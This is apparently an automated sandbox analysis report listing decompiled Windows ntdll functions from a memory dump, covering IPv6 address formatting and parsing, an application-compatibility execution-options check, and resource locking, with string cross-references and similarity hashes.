Strings

Kernel-MUI-Language-Disallowed, xrefs: 00AB8914
Kernel-MUI-Language-Allowed, xrefs: 00AB8827
Kernel-MUI-Language-SKU, xrefs: 00AB89FC
Kernel-MUI-Number-Allowed, xrefs: 00AB87E6
WindowsExcludedProcs, xrefs: 00AB87C1

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: 390cfeed30c18dddca763cb40f6a5927edf50dcaa3da8a75ddd761fc214e50d9
Instruction ID: 59cd9e3976bd37492c93a86fbbf6917b8b3323d22a616b77c874ab6d23557c66
Opcode Fuzzy Hash: 390cfeed30c18dddca763cb40f6a5927edf50dcaa3da8a75ddd761fc214e50d9
Instruction Fuzzy Hash: B0F1C6B2D00209EFCF11DF99CA819EEBBFDFB08300F15456AE505A7252EB359A45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00AD13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00AD13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00AC7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xa92926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00AC7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xa99cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00AC7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00AC7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00AC7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00AC7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x00ad13d5
0x00ad13d9
0x00ad13dc
0x00ad13de
0x00ad13e1
0x00ad13e8
0x00ad13ee
0x00afe8fd
0x00000000
0x00afe921
0x00afe921
0x00afe928
0x00afe982
0x00afe98a
0x00000000
0x00afe99a
0x00afe99e
0x00afe9a3
0x00afe9a8
0x00afe9b9
0x00afe978
0x00000000
0x00afe978
0x00afe98a
0x00afe92a
0x00afe931
0x00afe944
0x00afe944
0x00afe950
0x00afe954
0x00afe959
0x00afe95e
0x00afe963
0x00afe970
0x00000000
0x00afe975
0x00afe93b
0x00afe980
0x00000000
0x00afe980
0x00afe942
0x00afe94b
0x00000000
0x00afe94b
0x00000000
0x00afe942
0x00ad13f4
0x00ad13f4
0x00ad13f9
0x00ad13fc
0x00ad13ff
0x00ad1406
0x00afe9cc
0x00afe9d2
0x00afe9d2
0x00afe9cc
0x00ad140c
0x00ad1411
0x00ad1431
0x00ad143a
0x00ad143c
0x00ad143f
0x00ad143f
0x00ad1442
0x00ad1447
0x00ad14a8
0x00ad14ac
0x00afe9e2
0x00afe9e7
0x00afe9ec
0x00afea05
0x00afea05
0x00000000
0x00ad1449
0x00000000
0x00ad1449
0x00ad144c
0x00ad1459
0x00ad1462
0x00ad1469
0x00ad146a
0x00ad1470
0x00ad1473
0x00ad1476
0x00ad1476
0x00ad1490
0x00ad1495
0x00ad138e
0x00ad1390
0x00ad1397
0x00ad1398
0x00ad1399
0x00ad13a1
0x00ad13a4
0x00ad13a4
0x00ad1498
0x00ad149c
0x00ad149f
0x00ad14a2
0x00000000
0x00000000
0x00ad14a4
0x00000000
0x00ad14a4
0x00ad1413
0x00ad1415
0x00ad1416
0x00ad1419
0x00ad141c
0x00ad1422
0x00ad13b7
0x00ad13bc
0x00ad13bf
0x00ad13bf
0x00ad13c2
0x00ad1424
0x00ad1424
0x00ad1424
0x00ad1427
0x00ad142b
0x00ad142c
0x00ad142c
0x00ad142c
0x00000000
0x00ad141c
0x00ad1411

APIs

___swprintf_l.LIBCMT ref: 00AD146B
___swprintf_l.LIBCMT ref: 00AD1490
___swprintf_l.LIBCMT ref: 00AFE970

Strings

:%u.%u.%u.%u, xrefs: 00AFE9F4
ffff:, xrefs: 00AFE94B
::%hs%u.%u.%u.%u, xrefs: 00AFE967
::ffff:0:%u.%u.%u.%u, xrefs: 00AFE9B0

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 04598611dfbf8fc6e6f5dc035ae7c422898f4749e5145ee7a5396cde820ba6d5
Instruction ID: 4dfb7f8de540df7a903ecac461e7bf9b73ac6c8e1c49688a5e0d05e6d987776c
Opcode Fuzzy Hash: 04598611dfbf8fc6e6f5dc035ae7c422898f4749e5145ee7a5396cde820ba6d5
Instruction Fuzzy Hash: E461F3F1A04659BACF34DFA9C8808BFBBF5EF94300B54C52EF59647641D274AA40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AC7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00AC7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xb72088; // 0x777eda1d
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00AC7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00AE3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00A9DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xb74218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00AE3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00AA0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00AE3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00AA8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00AE3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00B0E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00AE3F92();
					_t38 = 1;
					L2:
					return E00A9E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x00ac7f08
0x00ac7f0f
0x00ac7f12
0x00ac7f1b
0x00ac7f31
0x00ae3ead
0x00ae3eb4
0x00000000
0x00000000
0x00ae3eba
0x00ae3ecd
0x00ae3ed2
0x00ae3ee1
0x00ae3ee7
0x00ae3eec
0x00ae3f12
0x00ae3f18
0x00ae3f1a
0x00000000
0x00000000
0x00ae3f20
0x00ae3f26
0x00ae3f28
0x00000000
0x00000000
0x00ae3f2e
0x00ae3f30
0x00000000
0x00000000
0x00ae3f3a
0x00ae3f3b
0x00ae3f53
0x00ae3f64
0x00ae3f69
0x00ae3f6c
0x00ae3f6d
0x00ae3f6f
0x00aee304
0x00aee30f
0x00aee315
0x00aee31e
0x00aee321
0x00aee327
0x00aee329
0x00000000
0x00000000
0x00000000
0x00000000
0x00aee32f
0x00aee32f
0x00aee337
0x00aee33a
0x00aee33b
0x00aee33d
0x00aee33f
0x00aee341
0x00aee341
0x00aee34e
0x00aee353
0x00aee358
0x00aee35d
0x00aee35f
0x00000000
0x00000000
0x00aee365
0x00aee365
0x00aee368
0x00aee36e
0x00000000
0x00000000
0x00aee374
0x00aee32f
0x00ae3f75
0x00ae3f7a
0x00ae3f7c
0x00ae3f7e
0x00ae3f86
0x00ac7f39
0x00ac7f47
0x00ac7f47
0x00ac7f37
0x00ac7f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00AE3F12

Strings

ExecuteOptions, xrefs: 00AE3F04
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00AE3F75
CLIENT(ntdll): Processing section info %ws..., xrefs: 00AEE345
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00AE3EC4
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00AEE2FB
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00AE3F4A
Execute=1, xrefs: 00AE3F5E

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 7489a850f63642bc80e970bde8ce048c0ee29f2cf628c57c53f9db77ab9577e3
Instruction ID: 72287aa82336355fac3ada804c5d90a5034f0a6f4f34408460f48bbbaf7fc8b3
Opcode Fuzzy Hash: 7489a850f63642bc80e970bde8ce048c0ee29f2cf628c57c53f9db77ab9577e3
Instruction Fuzzy Hash: 7D416572A4025D7ADF20DAA59CCAFDE73FCAB54700F0005ADB509A7191EA709A45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AD0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AD0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00AA8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00A9DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00AD0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00AD0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00AD06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00AD06BA(_t135, _t178) == 0 || E00AD0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00AD0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00AD0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00AD06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00AD06BA(_t124, _t142) == 0 || E00AD0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x00ad0b21
0x00ad0b24
0x00ad0b27
0x00ad0b2a
0x00ad0b2d
0x00ad0b30
0x00ad0b33
0x00ad0b36
0x00ad0b39
0x00ad0b3e
0x00ad0c65
0x00ad0c68
0x00ad0c6a
0x00ad0c6f
0x00afeb42
0x00000000
0x00000000
0x00afeb48
0x00afeb48
0x00ad0c75
0x00ad0c7a
0x00afeb54
0x00000000
0x00000000
0x00000000
0x00afeb5a
0x00ad0c80
0x00ad0c84
0x00afeb98
0x00000000
0x00000000
0x00afeba6
0x00ad0cb8
0x00ad0cba
0x00ad0cd3
0x00ad0cda
0x00ad0ce4
0x00ad0ce9
0x00000000
0x00ad0cec
0x00ad0c8c
0x00afeb63
0x00000000
0x00000000
0x00afeb70
0x00afeb75
0x00afeb7d
0x00000000
0x00000000
0x00afeb8c
0x00000000
0x00afeb8c
0x00ad0c96
0x00000000
0x00000000
0x00ad0ca2
0x00ad0cac
0x00ad0cb4
0x00000000
0x00000000
0x00ad0b44
0x00ad0b47
0x00ad0b49
0x00000000
0x00000000
0x00ad0b4f
0x00ad0b50
0x00000000
0x00000000
0x00ad0b56
0x00ad0b62
0x00ad0b7c
0x00ad0bac
0x00ad0a0f
0x00afeaaa
0x00000000
0x00afeac4
0x00afeac4
0x00ad0bd0
0x00ad0bd0
0x00ad0bd4
0x00ad0bd9
0x00000000
0x00000000
0x00ad0bdb
0x00ad0be0
0x00afeb0e
0x00ad0a1a
0x00000000
0x00ad0a1a
0x00afeb1a
0x00afeb1f
0x00afeb27
0x00000000
0x00000000
0x00afeb36
0x00000000
0x00afeb36
0x00ad0bea
0x00000000
0x00000000
0x00ad0bf6
0x00ad0c00
0x00ad0c03
0x00ad0c0b
0x00000000
0x00ad0c0b
0x00afeaaa
0x00000000
0x00ad0a15
0x00ad0bb6
0x00000000
0x00ad0bc6
0x00ad0bc6
0x00ad0bcb
0x00ad0c15
0x00000000
0x00000000
0x00ad0c1d
0x00ad0c20
0x00ad0c21
0x00ad0c24
0x00ad0c24
0x00ad0c26
0x00000000
0x00ad0c26
0x00ad0bcd
0x00000000
0x00ad0bcd
0x00ad0b89
0x00ad0b89
0x00ad0b90
0x00000000
0x00000000
0x00ad0b96
0x00000000
0x00ad0b96
0x00ad0a04
0x00ad0a04
0x00ad0b9a
0x00ad0b9a
0x00ad0b9b
0x00ad0b9f
0x00000000
0x00000000
0x00000000
0x00ad0ba5
0x00ad0ac7
0x00ad0aca
0x00afeacf
0x00000000
0x00afeade
0x00afeade
0x00afeae3
0x00000000
0x00000000
0x00afeaf3
0x00afeaf6
0x00afeaf7
0x00afeafe
0x00afeb01
0x00000000
0x00afeb01
0x00afeacf
0x00ad0ad0
0x00ad0ad4
0x00000000
0x00000000
0x00ad0ada
0x00ad0ae6
0x00ad0c34
0x00000000
0x00ad0c47
0x00ad0c49
0x00ad0c4a
0x00ad0c4e
0x00ad0c51
0x00ad0c54
0x00ad0c57
0x00ad0c5a
0x00000000
0x00000000
0x00000000
0x00ad0c60
0x00ad0afb
0x00ad0afe
0x00ad0b02
0x00ad0b05
0x00ad0b08
0x00000000
0x00ad0b08
0x00ad0ae6
0x00ad0b44
0x00ad09f8
0x00ad09f8
0x00ad09f9
0x00000000
0x00000000
0x00afeaa0
0x00000000

APIs

__fassign.LIBCMT ref: 00AD0BF6
__fassign.LIBCMT ref: 00AD0CA2

Strings

:, xrefs: 00AD0AC7
., xrefs: 00AD0A0C
:, xrefs: 00AD0BA9

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: e01486372bba3c26e3e4b224a0d344bfc58651747f18ffa6e45564a73dcbd73b
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 43A18871A1430AEFCB24CFA4C845BFEB7B4AF45305F24856BE853A7392D6349A41CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00AD0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00AD0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b701c0;
									_push(_t144);
									_push(0);
									_t51 = E00A8F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00AD4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00AE3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00AE3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00B1217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00AE3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00AD3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
